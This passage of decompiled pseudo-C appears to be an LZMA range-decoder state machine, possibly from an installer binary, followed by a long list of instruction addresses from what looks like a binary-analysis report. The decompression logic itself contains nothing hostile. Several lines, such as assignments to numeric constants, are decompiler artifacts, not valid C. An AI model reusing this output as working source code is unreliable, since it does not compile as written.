                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            								goto L39;
                                                                                            							} else {
                                                                                            								goto L37;
                                                                                            							}
                                                                                            						case 0xe:
                                                                                            							L46:
                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0xe;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							_t156 = __ebp - 0x70;
                                                                                            							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                            							__eflags =  *_t156;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							while(1) {
                                                                                            								L48:
                                                                                            								__eflags = __ebx - 0x100;
                                                                                            								if(__ebx >= 0x100) {
                                                                                            									break;
                                                                                            								}
                                                                                            								__eax =  *(__ebp - 0x58);
                                                                                            								__edx = __ebx + __ebx;
                                                                                            								__ecx =  *(__ebp - 0x10);
                                                                                            								__esi = __edx + __eax;
                                                                                            								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            								__ax =  *__esi;
                                                                                            								 *(__ebp - 0x54) = __esi;
                                                                                            								__edi = __ax & 0x0000ffff;
                                                                                            								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            								if( *(__ebp - 0xc) >= __ecx) {
                                                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            									__cx = __ax;
                                                                                            									_t170 = __edx + 1; // 0x1
                                                                                            									__ebx = _t170;
                                                                                            									__cx = __ax >> 5;
                                                                                            									__eflags = __eax;
                                                                                            									 *__esi = __ax;
                                                                                            								} else {
                                                                                            									 *(__ebp - 0x10) = __ecx;
                                                                                            									0x800 = 0x800 - __edi;
                                                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            									__ebx = __ebx + __ebx;
                                                                                            									 *__esi = __cx;
                                                                                            								}
                                                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            									continue;
                                                                                            								} else {
                                                                                            									goto L46;
                                                                                            								}
                                                                                            							}
                                                                                            							L54:
                                                                                            							_t173 = __ebp - 0x34;
                                                                                            							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                            							__eflags =  *_t173;
                                                                                            							goto L55;
                                                                                            						case 0xf:
                                                                                            							L58:
                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0xf;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							_t203 = __ebp - 0x70;
                                                                                            							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                            							__eflags =  *_t203;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							L60:
                                                                                            							__eflags = __ebx - 0x100;
                                                                                            							if(__ebx >= 0x100) {
                                                                                            								L55:
                                                                                            								__al =  *(__ebp - 0x44);
                                                                                            								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                            								goto L56;
                                                                                            							}
                                                                                            							L61:
                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                            							__edx = __ebx + __ebx;
                                                                                            							__ecx =  *(__ebp - 0x10);
                                                                                            							__esi = __edx + __eax;
                                                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            							__ax =  *__esi;
                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            								__cx = __ax;
                                                                                            								_t217 = __edx + 1; // 0x1
                                                                                            								__ebx = _t217;
                                                                                            								__cx = __ax >> 5;
                                                                                            								__eflags = __eax;
                                                                                            								 *__esi = __ax;
                                                                                            							} else {
                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                            								0x800 = 0x800 - __edi;
                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            								__ebx = __ebx + __ebx;
                                                                                            								 *__esi = __cx;
                                                                                            							}
                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            								goto L60;
                                                                                            							} else {
                                                                                            								goto L58;
                                                                                            							}
                                                                                            						case 0x10:
                                                                                            							L109:
                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0x10;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							_t365 = __ebp - 0x70;
                                                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                            							__eflags =  *_t365;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							goto L111;
                                                                                            						case 0x11:
                                                                                            							goto L69;
                                                                                            						case 0x12:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								__eax =  *(__ebp - 0x58);
                                                                                            								 *(__ebp - 0x84) = 0x13;
                                                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                                                            								goto L132;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                            							__eflags = __eax;
                                                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                            							goto L130;
                                                                                            						case 0x13:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								_t469 = __ebp - 0x58;
                                                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                            								__eflags =  *_t469;
                                                                                            								 *(__ebp - 0x30) = 0x10;
                                                                                            								 *(__ebp - 0x40) = 8;
                                                                                            								L144:
                                                                                            								 *(__ebp - 0x7c) = 0x14;
                                                                                            								goto L145;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                            							 *(__ebp - 0x30) = 8;
                                                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                            							L130:
                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                            							 *(__ebp - 0x40) = 3;
                                                                                            							goto L144;
                                                                                            						case 0x14:
                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                            							__eax =  *(__ebp - 0x80);
                                                                                            							goto L140;
                                                                                            						case 0x15:
                                                                                            							__eax = 0;
                                                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            							__al = __al & 0x000000fd;
                                                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                            							goto L120;
                                                                                            						case 0x16:
                                                                                            							__eax =  *(__ebp - 0x30);
                                                                                            							__eflags = __eax - 4;
                                                                                            							if(__eax >= 4) {
                                                                                            								_push(3);
                                                                                            								_pop(__eax);
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 4);
                                                                                            							 *(__ebp - 0x40) = 6;
                                                                                            							__eax = __eax << 7;
                                                                                            							 *(__ebp - 0x7c) = 0x19;
                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                            							goto L145;
                                                                                            						case 0x17:
                                                                                            							L145:
                                                                                            							__eax =  *(__ebp - 0x40);
                                                                                            							 *(__ebp - 0x50) = 1;
                                                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                            							goto L149;
                                                                                            						case 0x18:
                                                                                            							L146:
                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0x18;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							_t484 = __ebp - 0x70;
                                                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                            							__eflags =  *_t484;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							L148:
                                                                                            							_t487 = __ebp - 0x48;
                                                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                            							__eflags =  *_t487;
                                                                                            							L149:
                                                                                            							__eflags =  *(__ebp - 0x48);
                                                                                            							if( *(__ebp - 0x48) <= 0) {
                                                                                            								__ecx =  *(__ebp - 0x40);
                                                                                            								__ebx =  *(__ebp - 0x50);
                                                                                            								0 = 1;
                                                                                            								__eax = 1 << __cl;
                                                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                            								__eax =  *(__ebp - 0x7c);
                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                            								goto L140;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x50);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                            							__esi = __edx + __eax;
                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                            							__ax =  *__esi;
                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            								__cx = __ax;
                                                                                            								__cx = __ax >> 5;
                                                                                            								__eax = __eax - __ecx;
                                                                                            								__edx = __edx + 1;
                                                                                            								__eflags = __edx;
                                                                                            								 *__esi = __ax;
                                                                                            								 *(__ebp - 0x50) = __edx;
                                                                                            							} else {
                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                            								0x800 = 0x800 - __edi;
                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            								 *__esi = __cx;
                                                                                            							}
                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            								goto L148;
                                                                                            							} else {
                                                                                            								goto L146;
                                                                                            							}
                                                                                            						case 0x19:
                                                                                            							__eflags = __ebx - 4;
                                                                                            							if(__ebx < 4) {
                                                                                            								 *(__ebp - 0x2c) = __ebx;
                                                                                            								L119:
                                                                                            								_t393 = __ebp - 0x2c;
                                                                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                            								__eflags =  *_t393;
                                                                                            								L120:
                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                            								__eflags = __eax;
                                                                                            								if(__eax == 0) {
                                                                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                            									goto L170;
                                                                                            								}
                                                                                            								__eflags = __eax -  *(__ebp - 0x60);
                                                                                            								if(__eax >  *(__ebp - 0x60)) {
                                                                                            									goto L171;
                                                                                            								}
                                                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                            								__eax =  *(__ebp - 0x30);
                                                                                            								_t400 = __ebp - 0x60;
                                                                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                            								__eflags =  *_t400;
                                                                                            								goto L123;
                                                                                            							}
                                                                                            							__ecx = __ebx;
                                                                                            							__eax = __ebx;
                                                                                            							__ecx = __ebx >> 1;
                                                                                            							__eax = __ebx & 0x00000001;
                                                                                            							__ecx = (__ebx >> 1) - 1;
                                                                                            							__al = __al | 0x00000002;
                                                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                                                            							__eflags = __ebx - 0xe;
                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                            							if(__ebx >= 0xe) {
                                                                                            								__ebx = 0;
                                                                                            								 *(__ebp - 0x48) = __ecx;
                                                                                            								L102:
                                                                                            								__eflags =  *(__ebp - 0x48);
                                                                                            								if( *(__ebp - 0x48) <= 0) {
                                                                                            									__eax = __eax + __ebx;
                                                                                            									 *(__ebp - 0x40) = 4;
                                                                                            									 *(__ebp - 0x2c) = __eax;
                                                                                            									__eax =  *(__ebp - 4);
                                                                                            									__eax =  *(__ebp - 4) + 0x644;
                                                                                            									__eflags = __eax;
                                                                                            									L108:
                                                                                            									__ebx = 0;
                                                                                            									 *(__ebp - 0x58) = __eax;
                                                                                            									 *(__ebp - 0x50) = 1;
                                                                                            									 *(__ebp - 0x44) = 0;
                                                                                            									 *(__ebp - 0x48) = 0;
                                                                                            									L112:
                                                                                            									__eax =  *(__ebp - 0x40);
                                                                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                            										_t391 = __ebp - 0x2c;
                                                                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                            										__eflags =  *_t391;
                                                                                            										goto L119;
                                                                                            									}
                                                                                            									__eax =  *(__ebp - 0x50);
                                                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            									__eax =  *(__ebp - 0x58);
                                                                                            									__esi = __edi + __eax;
                                                                                            									 *(__ebp - 0x54) = __esi;
                                                                                            									__ax =  *__esi;
                                                                                            									__ecx = __ax & 0x0000ffff;
                                                                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                            									if( *(__ebp - 0xc) >= __edx) {
                                                                                            										__ecx = 0;
                                                                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                            										__ecx = 1;
                                                                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                            										__ebx = 1;
                                                                                            										__ecx =  *(__ebp - 0x48);
                                                                                            										__ebx = 1 << __cl;
                                                                                            										__ecx = 1 << __cl;
                                                                                            										__ebx =  *(__ebp - 0x44);
                                                                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                            										__cx = __ax;
                                                                                            										__cx = __ax >> 5;
                                                                                            										__eax = __eax - __ecx;
                                                                                            										__edi = __edi + 1;
                                                                                            										__eflags = __edi;
                                                                                            										 *(__ebp - 0x44) = __ebx;
                                                                                            										 *__esi = __ax;
                                                                                            										 *(__ebp - 0x50) = __edi;
                                                                                            									} else {
                                                                                            										 *(__ebp - 0x10) = __edx;
                                                                                            										0x800 = 0x800 - __ecx;
                                                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            										 *__esi = __dx;
                                                                                            									}
                                                                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            										L111:
                                                                                            										_t368 = __ebp - 0x48;
                                                                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                            										__eflags =  *_t368;
                                                                                            										goto L112;
                                                                                            									} else {
                                                                                            										goto L109;
                                                                                            									}
                                                                                            								}
                                                                                            								__ecx =  *(__ebp - 0xc);
                                                                                            								__ebx = __ebx + __ebx;
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                            									__ecx =  *(__ebp - 0x10);
                                                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            									__ebx = __ebx | 0x00000001;
                                                                                            									__eflags = __ebx;
                                                                                            									 *(__ebp - 0x44) = __ebx;
                                                                                            								}
                                                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            									L101:
                                                                                            									_t338 = __ebp - 0x48;
                                                                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                            									__eflags =  *_t338;
                                                                                            									goto L102;
                                                                                            								} else {
                                                                                            									goto L99;
                                                                                            								}
                                                                                            							}
                                                                                            							__edx =  *(__ebp - 4);
                                                                                            							__eax = __eax - __ebx;
                                                                                            							 *(__ebp - 0x40) = __ecx;
                                                                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                            							goto L108;
                                                                                            						case 0x1a:
                                                                                            							L56:
                                                                                            							__eflags =  *(__ebp - 0x64);
                                                                                            							if( *(__ebp - 0x64) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0x1a;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x68);
                                                                                            							__al =  *(__ebp - 0x5c);
                                                                                            							__edx =  *(__ebp - 8);
                                                                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            							 *( *(__ebp - 0x68)) = __al;
                                                                                            							__ecx =  *(__ebp - 0x14);
                                                                                            							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                            							__eax = __ecx + 1;
                                                                                            							__edx = 0;
                                                                                            							_t192 = __eax %  *(__ebp - 0x74);
                                                                                            							__eax = __eax /  *(__ebp - 0x74);
                                                                                            							__edx = _t192;
                                                                                            							goto L79;
                                                                                            						case 0x1b:
                                                                                            							goto L75;
                                                                                            						case 0x1c:
                                                                                            							while(1) {
                                                                                            								L123:
                                                                                            								__eflags =  *(__ebp - 0x64);
                                                                                            								if( *(__ebp - 0x64) == 0) {
                                                                                            									break;
                                                                                            								}
                                                                                            								__eax =  *(__ebp - 0x14);
                                                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                                                            									__eflags = __eax;
                                                                                            								}
                                                                                            								__edx =  *(__ebp - 8);
                                                                                            								__cl =  *(__eax + __edx);
                                                                                            								__eax =  *(__ebp - 0x14);
                                                                                            								 *(__ebp - 0x5c) = __cl;
                                                                                            								 *(__eax + __edx) = __cl;
                                                                                            								__eax = __eax + 1;
                                                                                            								__edx = 0;
                                                                                            								_t414 = __eax %  *(__ebp - 0x74);
                                                                                            								__eax = __eax /  *(__ebp - 0x74);
                                                                                            								__edx = _t414;
                                                                                            								__eax =  *(__ebp - 0x68);
                                                                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                            								__eflags =  *(__ebp - 0x30);
                                                                                            								 *( *(__ebp - 0x68)) = __cl;
                                                                                            								 *(__ebp - 0x14) = _t414;
                                                                                            								if( *(__ebp - 0x30) > 0) {
                                                                                            									continue;
                                                                                            								} else {
                                                                                            									goto L80;
                                                                                            								}
                                                                                            							}
                                                                                            							 *(__ebp - 0x88) = 0x1c;
                                                                                            							goto L170;
                                                                                            					}
                                                                                            				}
                                                                                            			}













                                                                                            0x00000000
                                                                                            0x00406398
                                                                                            0x00406398
                                                                                            0x0040639c
                                                                                            0x00406453
                                                                                            0x00406456
                                                                                            0x00406462
                                                                                            0x00406343
                                                                                            0x00406343
                                                                                            0x00406346
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066c1
                                                                                            0x004066c7
                                                                                            0x004066cd
                                                                                            0x004066e7
                                                                                            0x004066ea
                                                                                            0x004066f0
                                                                                            0x004066fb
                                                                                            0x004066fd
                                                                                            0x004066cf
                                                                                            0x004066cf
                                                                                            0x004066de
                                                                                            0x004066e2
                                                                                            0x004066e2
                                                                                            0x00406707
                                                                                            0x0040672e
                                                                                            0x0040672e
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x00406709
                                                                                            0x00406709
                                                                                            0x0040670d
                                                                                            0x004068bc
                                                                                            0x00000000
                                                                                            0x004068bc
                                                                                            0x00406719
                                                                                            0x00406720
                                                                                            0x00406728
                                                                                            0x0040672b
                                                                                            0x00000000
                                                                                            0x0040672b
                                                                                            0x004063a2
                                                                                            0x004063a6
                                                                                            0x004068e7
                                                                                            0x004068e7
                                                                                            0x004068ea
                                                                                            0x004068ee
                                                                                            0x004068ee
                                                                                            0x004063ac
                                                                                            0x004063b2
                                                                                            0x004063b5
                                                                                            0x004063b9
                                                                                            0x004063bc
                                                                                            0x004063c0
                                                                                            0x00406886
                                                                                            0x004068d2
                                                                                            0x004068da
                                                                                            0x004068e1
                                                                                            0x004068e3
                                                                                            0x00000000
                                                                                            0x004068e3
                                                                                            0x004063c6
                                                                                            0x004063c9
                                                                                            0x004063cf
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d4
                                                                                            0x004063d7
                                                                                            0x004063da
                                                                                            0x004063dd
                                                                                            0x004063e0
                                                                                            0x004063e3
                                                                                            0x004063e4
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e9
                                                                                            0x004063ec
                                                                                            0x004063ef
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f5
                                                                                            0x004063f7
                                                                                            0x004063f7
                                                                                            0x004063fa
                                                                                            0x004063fa
                                                                                            0x004063fa
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x00000000
                                                                                            0x00405eea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ef3
                                                                                            0x00405ef6
                                                                                            0x00405ef9
                                                                                            0x00405efd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f03
                                                                                            0x00405f06
                                                                                            0x00405f08
                                                                                            0x00405f09
                                                                                            0x00405f0c
                                                                                            0x00405f0e
                                                                                            0x00405f0f
                                                                                            0x00405f11
                                                                                            0x00405f14
                                                                                            0x00405f19
                                                                                            0x00405f1e
                                                                                            0x00405f27
                                                                                            0x00405f3a
                                                                                            0x00405f3d
                                                                                            0x00405f49
                                                                                            0x00405f71
                                                                                            0x00405f73
                                                                                            0x00405f81
                                                                                            0x00405f81
                                                                                            0x00405f85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f75
                                                                                            0x00405f78
                                                                                            0x00405f79
                                                                                            0x00405f79
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f4f
                                                                                            0x00405f54
                                                                                            0x00405f54
                                                                                            0x00405f5d
                                                                                            0x00405f65
                                                                                            0x00405f68
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f8b
                                                                                            0x00405f8b
                                                                                            0x00405f8f
                                                                                            0x0040683b
                                                                                            0x00000000
                                                                                            0x0040683b
                                                                                            0x00405f98
                                                                                            0x00405fa8
                                                                                            0x00405fab
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fb1
                                                                                            0x00405fb5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405fb7
                                                                                            0x00405fbd
                                                                                            0x00405fe7
                                                                                            0x00405fed
                                                                                            0x00405ff4
                                                                                            0x00000000
                                                                                            0x00405ff4
                                                                                            0x00405fc3
                                                                                            0x00405fc6
                                                                                            0x00405fcb
                                                                                            0x00405fcb
                                                                                            0x00405fd6
                                                                                            0x00405fde
                                                                                            0x00405fe1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406026
                                                                                            0x0040602c
                                                                                            0x0040602f
                                                                                            0x0040603c
                                                                                            0x00406044
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ffb
                                                                                            0x00405ffb
                                                                                            0x00405fff
                                                                                            0x0040684a
                                                                                            0x00000000
                                                                                            0x0040684a
                                                                                            0x0040600b
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406019
                                                                                            0x0040601c
                                                                                            0x0040601f
                                                                                            0x00406024
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040604c
                                                                                            0x0040604e
                                                                                            0x00406051
                                                                                            0x004060c2
                                                                                            0x004060c5
                                                                                            0x004060c8
                                                                                            0x004060cf
                                                                                            0x004060d9
                                                                                            0x00000000
                                                                                            0x004060d9
                                                                                            0x00406053
                                                                                            0x00406057
                                                                                            0x0040605a
                                                                                            0x0040605c
                                                                                            0x0040605f
                                                                                            0x00406062
                                                                                            0x00406064
                                                                                            0x00406067
                                                                                            0x00406069
                                                                                            0x0040606e
                                                                                            0x00406071
                                                                                            0x00406074
                                                                                            0x00406078
                                                                                            0x0040607f
                                                                                            0x00406082
                                                                                            0x00406089
                                                                                            0x0040608d
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406099
                                                                                            0x0040609c
                                                                                            0x004060ba
                                                                                            0x004060bc
                                                                                            0x00000000
                                                                                            0x0040609e
                                                                                            0x0040609e
                                                                                            0x004060a1
                                                                                            0x004060a4
                                                                                            0x004060a7
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060ac
                                                                                            0x004060af
                                                                                            0x004060b1
                                                                                            0x004060b2
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x004062eb
                                                                                            0x004062ef
                                                                                            0x0040630d
                                                                                            0x00406310
                                                                                            0x00406317
